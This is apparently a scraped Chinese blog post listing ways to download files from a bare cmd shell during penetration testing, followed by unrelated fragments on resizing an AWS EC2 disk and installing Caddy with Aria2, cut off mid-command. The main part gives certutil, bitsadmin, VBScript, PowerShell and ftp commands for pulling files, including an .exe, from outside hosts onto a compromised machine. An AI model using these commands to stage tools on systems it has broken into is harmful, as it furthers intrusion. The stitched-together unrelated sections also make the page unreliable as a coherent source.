cmd 环境下载文件的几种方法

2019-10-16 10:38:55

在渗透中通常会遇到只有cmd shell的情况,在这种情况下,通常需要下载文件来进行后续渗透。这里记录了几种在cmd下不需要其他三方程序就可以直接下载文件的方法。

1.certutil
certutil -urlcache -split -f https://www.xxx.com/test.py
certutil -urlcache -split -f https://www.xxx.com/test.py ff.py #指定保存文件名

2.bitsadmin
bitsadmin /transfer n http://www.xx.com/code.jpg c:\users\sdyp\desktop\ff.jpg

3.vbs

#用echo写入
On Error Resume Next  
Dim iRemote,iLocal  
iLocal = LCase(WScript.Arguments(1))  
iRemote = LCase(WScript.Arguments(0))  
Set xPost = createObject("Microsoft.XMLHTTP") 
xPost.Open "GET",iRemote,0 
xPost.Send() 
Set sGet = createObject("ADODB.Stream") 
sGet.Mode = 3 
sGet.Type = 1 
sGet.Open() 
sGet.Write(xPost.responseBody) 
sGet.SaveToFile iLocal,2 

cscript ff.vbs http://www.xxx.com/xx.jpg xx.jpg

4.powershell
powershell (new-object System.Net.WebClient).DownloadFile( 'http://www.xx.com/ff.jpg','c:\aaa.jpg')

5.ftp

echo open 8.8.8.8  >a.txt & echo get fuck.exe>>a.txt &echo bye>>a.txt
ftp -A -s:a.txt
Aws Ec2在ubuntu上进行磁盘扩容

centos扩容请参照文章:https://gov.com.sb/centos-growpart/ 安装扩容工具 sudo apt-get install cloud-init 等待ebs卷大小调整完成后,在扩容的实例中执行lsblk列出连接到实例的EBS设备 查询硬盘空间 设备已经扩容到30g,但是操作系统只能看到原来的8g 使用growpart展开修改后的分区(注意将设备名称与分区名称分隔开) sudo growpart /dev/xvda 1 ** 通过lsblk可以确认分区/dev/xvda1已经填充上可用空间 lsblk 使用以下命令并替换要扩展的设备名称 sudo resize2fs /dev/xvda1 完成扩容 查看是否扩容成功 df -h

CentOS 7一键安装Caddy + Aria2 + AriaNg实现离线下载

支持CentOS/Ubuntu/Debian系统,主要解决之前BT/磁力无法下载的问题,同时将YAAW替换为AriaNg,管理更加方便,以下简称CCAA 主要功能 支持HTTP/HTTPS/FTP/BT/磁力链接等离线下载,断点续传等文件管理、视频在线播放环境要求CentOS 6+/Debian 8+/Ubuntu 14+操作系统要求64位安装CCAA复制下面的命令,一行一个: #CentOS执行以下命令 yum -y install wget unzip curl wget https://github.com/helloxz/ccaa/archive/master.zip unzip master.zip && cd ccaa-master && sh ccaa.